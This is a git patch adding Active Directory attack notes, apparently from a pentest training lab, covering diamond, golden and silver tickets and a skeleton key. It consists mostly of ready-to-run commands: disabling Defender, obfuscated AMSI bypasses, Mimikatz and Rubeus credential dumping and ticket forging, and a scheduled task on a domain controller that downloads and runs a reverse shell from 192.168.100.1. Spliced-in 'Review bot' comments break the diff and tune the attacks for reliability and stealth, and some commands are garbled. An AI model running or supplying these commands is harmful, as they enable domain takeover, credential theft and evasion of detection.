From 66072deda13877159f443ee46d71cf04fb07079e Mon Sep 17 00:00:00 2001 From: RFS Date: Wed, 3 Apr 2024 23:41:03 +0000 Subject: [PATCH] RFS-13: No subject --- SUMMARY.md | 4 ++ .../diamond-ticket.md | 15 +++++ .../golden-ticket.md | 65 +++++++++++++++++++ .../silver-ticket.md | 28 ++++++++ .../skeleton-key.md | 31 +++++++++ 5 files changed, 143 insertions(+) create mode 100644 domain-dominance-and-persistence/diamond-ticket.md create mode 100644 domain-dominance-and-persistence/golden-ticket.md create mode 100644 domain-dominance-and-persistence/silver-ticket.md create mode 100644 domain-dominance-and-persistence/skeleton-key.md diff --git a/SUMMARY.md b/SUMMARY.md index 4fbf77c..0483358 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -33,6 +33,10 @@ ## Domain Dominance & Persistence * [Description](domain-dominance-and-persistence/description.md) +* [Silver Ticket](domain-dominance-and-persistence/silver-ticket.md) +* [Golden Ticket](domain-dominance-and-persistence/golden-ticket.md) +* [Skeleton Key](domain-dominance-and-persistence/skeleton-key.md) +* [Diamond Ticket](domain-dominance-and-persistence/diamond-ticket.md) ## Cross Domain Attacks diff --git a/domain-dominance-and-persistence/diamond-ticket.md b/domain-dominance-and-persistence/diamond-ticket.md new file mode 100644 index 0000000..8de80b5 --- /dev/null +++ b/domain-dominance-and-persistence/diamond-ticket.md 
@@ -0,0 +1,15 @@
+# Diamond Ticket
+
+### Rubeus.exe
+
+#### We would still need krbtgt AES keys. Use the following Rubeus command to create a diamond ticket (note that RC4 or AES keys of the user can be used too)
+
+```
+Rubeus.exe diamond /krbkey:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /user:studentuserx /password:studentuserxpassword /enctype:aes /ticketuser:administrator /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
+```
+
+#### We could also use /tgtdeleg option in place of credentials in case we have access as a domain user
+
+```
+Rubeus.exe diamond /krbkey:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
+```
diff --git a/domain-dominance-and-persistence/golden-ticket.md b/domain-dominance-and-persistence/golden-ticket.md
new file mode 100644
index 0000000..5046524
--- /dev/null
+++ b/domain-dominance-and-persistence/golden-ticket.md
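Review bot: The page never says what a diamond ticket is or why it is preferred over a golden ticket, which is the whole point of the `/tgtdeleg` variant; add a one-line intro above the first command such as `A diamond ticket is a real TGT issued by the DC (obtained with credentials or via /tgtdeleg), decrypted with the krbtgt key, modified (ticketuser, groups) and re-encrypted — unlike a golden ticket it is backed by a genuine AS-REQ/AS-REP on the DC.` The heading's parenthetical "RC4 or AES keys of the user can be used too" refers to the requesting user's credential (`/password` or, per Rubeus's asktgt options, its `/rc4` or `/aes256` equivalent), not to `/krbkey`, which must stay the krbtgt AES256 key to match `/enctype:aes`; say so to avoid readers swapping the wrong value. It is also worth stating that obtaining the krbtgt key in the first place still requires DA-level access (DCSync or dumping on the DC), so this is a persistence technique, not a privilege-escalation one.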
@@ -0,0 +1,65 @@ +# Golden Ticket + +## Invoke-Mimikatz + +### Disable Defender \[ Important ] + +``` +Set-MpPreference -DisableRealtimeMonitoring $true +Set-MpPreference -DisableIOAVProtection $true +``` + +### AMSI bypass \[ Important ] + +``` +sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{O}"-F'F', 'rE' ) ) 3; ( GeT-VariaBle ( "1Q2U" + "zX" ) -VaL_s+)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{@}{5}" -f'Util', 'A', 'Amsi','.Management.', 'utomation.','s', 'System' ))."g`etf`iE1D"( ( "{O}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{O}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} ) + +S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) +``` + +### Execute mimikatz on DC as DA to get krbtgt hash + +``` +Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc +``` + +### Create a ticket on any machine \[ "pass the ticket" attack] + +``` +Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /krbtgt:a9b30e5bO0dc865eadcea941le4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' +``` + +### List Kerberos services available + +``` +klist +``` + +### To use the DCSync feature for getting krbtg hash execute the below command with DA privileges + +``` +Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' +``` + +``` +Using the DCSync option needs no code execution (no need to run Invoke-Mimikatz) on the target DC +``` + +*** + +## Binaries + +### Using SafetyKatz + +``` 
+C:\Users\Public\SafetyKatz.exe "lsadump::lsa /patch" "exit"
+or
+C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
+```
+
+### On a machine which can reach the DC over network (Need elevation):
+
+```
+C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
+```
+
diff --git a/domain-dominance-and-persistence/silver-ticket.md b/domain-dominance-and-persistence/silver-ticket.md
new file mode 100644
index 0000000..bacd127
--- /dev/null
+++ b/domain-dominance-and-persistence/silver-ticket.md
@@ -0,0 +1,28 @@
+# Silver Ticket
+
+### Invoke-Mimikatz
+
+#### Execute mimikatz on DC as DA to get krbtgt hash
+
+```
+Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
+```
+
+#### Using hash of the Domain Controller computer account, below command provides access to shares on the DC
+
+```
+Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62FF22 /user:Administrator /ptt"'
+```
+
+```
+Similar command can be used for any other service on a machine.
+Which services? HOST, RPCSS, WSMAN and many more.
+```
+
+### Schedule and execute a task
+
+```
+schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.psi''')'"
+
+schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
+```
diff --git a/domain-dominance-and-persistence/skeleton-key.md b/domain-dominance-and-persistence/skeleton-key.md
new file mode 100644
index 0000000..40834ce
--- /dev/null
+++ b/domain-dominance-and-persistence/skeleton-key.md
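Review bot: The `/krbtgt:` value in the Invoke-Mimikatz kerberos::golden command is not a valid NTLM hash — `a9b30e5bO0dc865eadcea941le4ade72d` contains the letters `O` and `l` where hex digits belong, so mimikatz will reject or mis-parse it; replace it with the 32-hex-character krbtgt hash taken from the lsadump/dcsync output (the BetterSafetyKatz example further down shows a well-formed one). The first AMSI-bypass variant is garbled the same way (`"{1}{O}"`, `{@}`, `g`etf`iE1D` where `-f` needs numeric `{0}` placeholders and the method is `GetField`), while the second variant is intact, so drop or fix the first one rather than leaving a line that will throw. The heading `### List Kerberos services available` above `klist` is wrong: klist lists the tickets cached in the current logon session, which is how you verify the `/ptt` injection worked — `### Verify the injected ticket (list cached Kerberos tickets)` would be accurate. Also note that both `Set-MpPreference` lines require an elevated local-admin session, and that `/endin:600 /renewmax:10080` is there to mimic the default domain ticket policy so the forged TGT is less conspicuous; a one-line comment saying so would help readers who copy the command.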
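Review bot: The `schtasks /create` step at the end will not work with the CIFS ticket forged above — CIFS only grants SMB share access, and remote task scheduling needs a HOST service ticket (the page's own "HOST, RPCSS, WSMAN" remark hints at this but never ties it to the task step); add a second forge line with `/service:HOST` (same `/target`, `/rc4` and `/sid`) immediately before the schtasks block, or say explicitly that it is required. The heading `#### Execute mimikatz on DC as DA to get krbtgt hash` is misleading for a silver ticket: the value actually consumed by `/rc4:` is the DC machine-account hash (`DCORP-DC$`), which `lsadump::lsa /patch` also dumps, so reword it to `#### Execute mimikatz on DC as DA to get the DC machine account (DCORP-DC$) hash`. `Invoke-PowerShellTcp.psi` in the `/TR` payload looks like a transcription error for `Invoke-PowerShellTcp.ps1`. Finally, a caveat worth adding under the `/rc4` command: a silver ticket is never validated by the DC (no TGS-REQ), so it is invisible to DC-side Kerberos logging but stops working as soon as the machine-account password rotates (30 days by default).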
@@ -0,0 +1,31 @@
+# Skeleton Key
+
+### Invoke-Mimikatz
+
+#### Use the below command to inject a skeleton-Key
+
+```
+Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
+```
+
+```
+Skeleton Key password is : **mimikatz**
+```
+
+#### Now we can access any machine with valid username and password as mimikatz
+
+```
+Enter-PSSession -Computername dcorp-dc.dollarcorp.moneycorp.local -credential dcorp\Administrator
+```
+
+#### LSASS running as a protected process
+
+In case Lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC
+
+```
+mimikatz # privilege::debug
+mimikatz # !+
+mimikatz # !processprotect /process:lsass.exe /remove
+mimikatz # misc::skeleton
+mimikatz # !-
+```
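Review bot: The Invoke-Mimikatz command is missing the closing double quote on the second mimikatz command — `'"privilege::debug" "misc::skeleton'` should be `'"privilege::debug" "misc::skeleton"'`; as written the inner string is unterminated and `misc::skeleton` is not parsed as a command. Add the operational caveat a reader needs before running this on a DC: the skeleton key is an in-memory patch of LSASS, so it disappears on the next DC reboot and must be re-injected on every DC the target may authenticate against, and it only adds a master password — existing passwords keep working, which is why it is hard to spot from the user side. The driver file for the protected-process path is `mimidrv.sys` (the text says `mimidriv.sys`), and `!+` loads it as a kernel driver, which is a driver-load / service-install event on the DC that is very likely to be logged and alerted on; call that out next to the "needs the mimikatz driver on disk" sentence.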